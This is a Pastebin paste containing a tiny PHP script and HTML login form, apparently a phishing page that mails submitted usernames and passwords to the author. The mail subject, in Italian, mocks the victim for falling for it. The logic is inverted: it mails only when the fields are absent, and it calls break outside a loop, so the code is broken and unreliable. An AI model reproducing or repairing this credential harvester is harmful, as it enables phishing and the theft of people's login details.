Advertisement
Guest User

Untitled

a guest
Oct 13th, 2017
475
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.42 KB | None | 0 0
  1. <?php
  2.  
  3.     if(isset($_POST['username']) && isset($_POST['password']))
  4.     {
  5.         break;
  6.     }
  7.     else
  8.     {
  9.         mail('latuaemail@provider.com', 'Un nabbo ci รจ cascato', "Username: " . $_POST['username'] . "  |  Password: " .  $_POST['password']);
  10.     }
  11.    
  12. ?>
  13.  
  14. <form method='POST' action='index.php'>
  15.  
  16.     <input type='text' name='username' />
  17.     <input type='password' name='password' />
  18.     <input type='submit' value='Login' />
  19.    
  20. </form>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement